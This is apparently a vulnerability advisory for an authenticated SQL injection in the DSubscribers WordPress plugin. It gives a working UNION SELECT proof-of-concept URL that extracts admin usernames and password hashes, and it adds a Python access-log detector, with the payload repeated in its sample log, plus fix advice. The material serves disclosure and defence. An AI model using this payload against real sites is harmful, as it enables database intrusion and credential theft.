wpexploit | Lenon Leite / Log.pt | WPEX-ID: 44A1E71B-A942-4252-999D-B8C8B42872A9
History: Jul 06, 2017 - 12:00 a.m.

DSubscribers <= 1.2 - Authenticated SQL Injection

2017-07-06 00:00:00
Lenon Leite / Log.pt
4

The DSubscribers WordPress plugin was affected by an Authenticated SQL Injection security vulnerability.

Proof of Concept:

1 – Log in with an admin user.

2 – Attack URL (the plugin passes the `dsubscribers` record id into the query without preparing it):
 http://target/wp-admin/admin.php?page=dsubscribers&action=edit&dsubscribers=0 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass) FROM wp_users WHERE ID=1
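As a detection aid, the following Python example is added here and is not part of the advisory or the plugin's code. It scans access-log lines for requests to the DSubscribers admin page whose `dsubscribers` parameter is anything other than a plain numeric record id, which is exactly the shape of the PoC above. The log lines, IP addresses and timestamps are constructed for the example; the function and variable names are the example's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample web-server access-log lines (common log format); these are
# illustrative, not captured traffic. Line 2 carries the same UNION SELECT
# payload shape shown in the advisory, URL-encoded as a browser would send it.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jul/2017:10:01:02 +0000] "GET /wp-admin/admin.php?page=dsubscribers&action=edit&dsubscribers=12 HTTP/1.1" 200 5120
10.0.0.9 - - [06/Jul/2017:10:03:15 +0000] "GET /wp-admin/admin.php?page=dsubscribers&action=edit&dsubscribers=0%20UNION%20SELECT%201,2,CONCAT(user_login,char(58),user_pass)%20FROM%20wp_users%20WHERE%20ID=1 HTTP/1.1" 200 6010
10.0.0.7 - - [06/Jul/2017:10:05:40 +0000] "GET /wp-admin/admin.php?page=dsubscribers HTTP/1.1" 200 4000
"""

# Minimal common-log-format parser: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# SQL tokens that have no business inside a numeric record id.
SQL_TOKEN_RE = re.compile(
    r"\b(UNION|SELECT|FROM|WHERE|CONCAT)\b|--|/\*|\bCHAR\s*\(", re.IGNORECASE
)


def parse_line(line):
    """Return a dict of the log fields, or None if the line is not CLF."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def check_dsubscribers_request(path):
    """Return a reason string if the request is a suspicious DSubscribers edit
    request, else None.

    The plugin's edit action expects 'dsubscribers' to be a record id, so a
    value that is anything other than digits is the signal; SQL keywords in it
    make the finding high-confidence. parse_qs percent-decodes the value.
    """
    qs = parse_qs(urlsplit(path).query)
    if qs.get("page") != ["dsubscribers"]:
        return None
    value = qs.get("dsubscribers", [None])[0]
    if value is None or value.isdigit():
        return None
    if SQL_TOKEN_RE.search(value):
        return "SQL tokens in dsubscribers id"
    return "non-numeric dsubscribers id"


def scan(log_text):
    """Scan access-log text and return one finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if not fields:
            continue
        reason = check_dsubscribers_request(fields["path"])
        if reason:
            findings.append(
                {
                    "ip": fields["ip"],
                    "ts": fields["ts"],
                    "status": fields["status"],
                    "reason": reason,
                }
            )
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} HTTP {f['status']}: {f['reason']}")
```

Because the PoC requires an authenticated admin, a hit on this check should be read together with the WordPress login records for that session rather than as an anonymous scan. On the fix side, the standard WordPress remedy for this class of bug is to cast the id with `absint()` and to build the query through `$wpdb->prepare()`; the advisory does not say how the plugin itself was patched.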